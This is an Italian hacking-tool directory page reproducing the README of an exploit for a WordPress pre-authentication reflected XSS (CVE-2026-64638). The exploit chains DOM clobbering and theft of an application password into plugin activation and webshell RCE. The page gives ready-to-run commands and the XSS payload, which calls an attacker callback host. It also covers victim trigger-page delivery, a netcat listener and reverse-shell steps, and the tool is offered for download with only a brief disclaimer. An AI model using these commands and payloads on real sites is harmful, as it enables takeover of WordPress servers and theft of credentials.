Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
XSS2Shell-CVE-2026-64638 — CVE-2026-64638 — XSS riflesso pre-autenticazione in WordPress → RCE tramite DOM Clobbering + furto di password applicative + attivazione plugin via REST API. PoC a doppia modalità (catena XSS e diretta). | Kitploit
Strumenti/GitHubGitHub/jendmaoul/xss2shell-cve-2026-64638
ExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebPenetration TestingRed TeamingSviluppo Payload
GitHubjendmaoul/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

CVE-2026-64638 — XSS riflesso pre-autenticazione in WordPress → RCE tramite DOM Clobbering + furto di password applicative + attivazione plugin via REST API. PoC a doppia modalità (catena XSS e diretta).

Vedi RepositorySito web
1661 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-64638 — XSS2Shell

WordPress Reflected XSS pre-autenticazione → Catena di Remote Code Execution

DOM Clobbering + furto di Application Password + attivazione plugin REST API = RCE completo

Python CVE License


⚡ Panoramica

CVE-2026-64638 è una Reflected XSS pre-autenticazione critica in WordPress wp-login.php. La vulnerabilità esiste perché il messaggio di errore di login riflette il nome utente inviato senza una corretta codifica HTML, consentendo il DOM Clobbering tramite <area id=ajaxurl> per aggirare la maggior parte dei filtri.

Se concatenata con la funzionalità Application Password di WordPress, questa XSS diventa un vettore di Remote Code Execution completo — nessuna interazione con l'utente oltre alla visita di una pagina trigger appositamente costruita mentre si è autenticati.

Catena di attacco

┌─────────────────────────────────────────────────────────────────┐
│  [1] XSS (Reflected)                                            │
│      wp-login.php reflects <area id=ajaxurl> in username error   │
│                          ↓                                       │
│  [2] DOM Clobbering                                             │
│      <area id=ajaxurl> hijacks wp-admin JS → auto-submits form   │
│                          ↓                                       │
│  [3] Application Password Theft                                 │
│      XSS redirects victim to authorize-application.php           │
│      success_url callback captures app password                  │
│                          ↓                                       │
│  [4] REST API Plugin Activation                                 │
│      App password → Basic Auth → wp-json/wp/v2/plugins → active  │
│                          ↓                                       │
│  [5] Webshell RCE                                               │
│      Plugin PHP webshell → uid=33(www-data)                      │
│      Reverse shell also available                                │
└─────────────────────────────────────────────────────────────────┘

🎯 Versioni interessate

VersionStatusNotes
WordPress ≤ 6.9.5✅ VulnerabileLe immagini Docker pre-backport sono ancora sfruttabili
WordPress 6.9.6+⚠️ Corretto (backport del 7 ago 2026)Le immagini Docker ricostruite dopo il 7 agosto includono la correzione
WordPress 7.0.x✅ VulnerabileConfermato su 7.0.2
WordPress 7.1+❓ SconosciutoNon testato

📦 Requisiti

pip3 install requests

Tutto qui. Libreria standard di Python 3.8+ per tutto il resto.


🚀 Utilizzo

Avvio rapido

# Clone
git clone https://github.com/linuxhackingid/XSS2Shell-CVE-2026-64638.git
cd XSS2Shell-CVE-2026-64638

# Auto mode (recommended)
python3 poc_fixed_v2.py --mode auto -u USER -p PASS --lhost YOUR_IP http://target.com

Modalità 1: Auto (rileva e sceglie la modalità migliore)

python3 poc_fixed_v2.py -u admin -p password123 --lhost 192.168.1.100 http://target.com
  • Rileva se la XSS è possibile → usa la catena XSS
  • Ripiega sulla modalità credenziali dirette se la XSS è stata corretta

Modalità 2: Catena XSS (nessuna credenziale richiesta!)

# Terminal 1: Run the exploit (starts callback server)
python3 poc_fixed_v2.py --mode xss --lhost 192.168.1.100 http://target.com

# Terminal 2: Host the trigger page
cd /path/to/XSS2Shell-CVE-2026-64638
python3 -m http.server 8000

# Send victim: http://192.168.1.100:8000/trigger_target.com.html

La vittima deve essere autenticata in WordPress come amministratore. La pagina trigger:

  1. Invia automaticamente il payload XSS a wp-login.php tramite un iframe nascosto
  2. Apre authorize-application.php per l'approvazione della vittima
  3. Cattura la Application Password tramite il server di callback
  4. La usa contro la REST API per attivare il plugin webshell

Modalità 3: Diretta (richiede credenziali)

python3 poc_fixed_v2.py --mode direct -u admin -p password123 http://target.com

Login diretto → caricamento plugin → webshell immediata. Nessuna XSS richiesta.

Reverse Shell

# In one terminal
nc -lvnp 4444

# In another — the exploit auto-triggers reverse shell when --lhost is set
python3 poc_fixed_v2.py --mode direct -u admin -p pass --lhost 192.168.1.100 --lport 4444 http://target.com

Oppure manualmente tramite webshell:

curl 'http://target.com/wp-content/plugins/xss2shell/xss2shell.php?rev=YOUR_IP:4444'

📂 File

XSS2Shell-CVE-2026-64638/
├── poc_fixed_v2.py              # Main exploit script (dual-mode)
├── poc.py                       # Original PoC (for reference)
├── trigger_192.168.0.87.html    # Example trigger page
└── README.md                    # This file

🔬 Dettagli tecnici

Il Payload XSS

< area id=ajaxurl shape=default href="http://attacker:9090/collect" >
<button id="wp-auth-check" onclick="window.ajaxurl='http://attacker:9090/collect'">x</button>

Perché funziona:

  • La funzione sanitize_user() di WordPress rimuove i tag HTML standard ma non intercetta <area> con uno spazio iniziale
  • L'<area id=ajaxurl> esegue il DOM Clobbering — dirotta window.ajaxurl usato dal JavaScript di wp-admin
  • L'intervallo wp_auth_check scatta e la XSS reindirizza la vittima a authorize-application.php
  • Il parametro success_url invia la password generata al server di callback dell'attaccante

Post-sfruttamento

Una volta catturata la Application Password:

  • REST API: Autenticati come la vittima contro /wp-json/wp/v2/
  • Plugin Activation: POST /wp-json/wp/v2/plugins/{slug} con {"status":"active"}
  • Webshell: Accedi a wp-content/plugins/xss2shell/xss2shell.php?cmd=COMMAND
  • Reverse Shell: ?rev=IP:PORT avvia /bin/sh -i di ritorno verso l'attaccante

✅ Verificato su

TargetVersionModeResult
Docker (locale)WordPress 7.0.2Catena XSS✅ RCE come www-data
Docker (locale)WordPress 7.0.2Diretta✅ RCE come www-data
Docker (locale)WordPress 6.7Catena XSS✅ RCE come www-data

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza e ricerca autorizzati. Gli autori non si assumono alcuna responsabilità per un uso improprio. Ottenere sempre un'autorizzazione scritta prima di eseguire i test.


📝 Crediti

  • Sviluppo PoC: linuxhackingid
  • CVE: CVE-2026-64638

"Niente Exploit, Niente Report." — Metodologia Shannon

Scarica lo strumento